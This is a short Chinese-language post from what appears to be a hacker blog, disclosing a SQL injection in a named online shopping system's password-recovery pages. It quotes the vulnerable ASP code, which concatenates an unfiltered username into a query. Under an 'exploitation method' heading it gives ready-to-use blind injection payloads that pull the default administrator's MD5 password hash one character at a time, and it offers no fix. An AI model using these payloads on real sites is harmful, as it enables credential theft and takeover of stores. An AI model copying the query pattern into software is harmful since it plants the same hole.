Cool Kid 's blog
涉及版本:网趣网上购物系统时尚版 v3.2
漏洞文件:getpwd2.asp,getpwd3.asp,getpwd4.asp
漏洞描述:变量username未经过滤带入sql查询,存在SQL注入漏洞.
关键代码:
ASP代码
<%
username=request.form("username") '明生注:主要是这里他接收值后并没有判断里面的内容就丢进数据库了
set rs=Server.CreateObject("Adodb.Recordset")
sql="select * from [user] where username='"&username"' "
rs.open sql,conn,1,1
If rs.eof Then
%>
<script language="javascript">
alert("这个用户没有注册,请注册!")
;javascrip:close();</script>
<%
End If
%>
<html><head><title>取回密码 | 回答问题</title>
<meta http-equiv="Content-Language" content="zh-cn">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link href="images/css.css" rel="stylesheet" type="text/css">
<script language="javascript">
<!--
function form1_onsubmit() {
if (document.form1.answer.value=="")
{
alert("请输入您的问题答案。")
document.form1.answer.focus()
return false
}
}
// --></script>
利用方法:
post提交数据(可以借用剑心的Sql.htm[http://www.loveshell.net/blog/blogview.asp?logID=70]),默认管理员ID为4,密码为16位md5(小写字母),确定下范围0-9的asc值48-57,小写字母的asc值97-122
SQL代码
' or (select count(*) from admin where adminid=4 and asc(mid(password,N,1)) between 48 and 57)<>0 and ''='
' or (select count(*) from admin where adminid=4 and asc(mid(password,N,1)) between 97 and 122)<>0 and ''='
正确返回"取回密码",错误返回对话框"这个用户没有注册,请注册!"
原创文章如转载,请注明:转载自心动吧黑客BLOG [ http://www.abcxd.com/abcxd/ ]
本文链接地址:http://www.abcxd.com/abcxd/abcxdArticle/ASPoday/228.html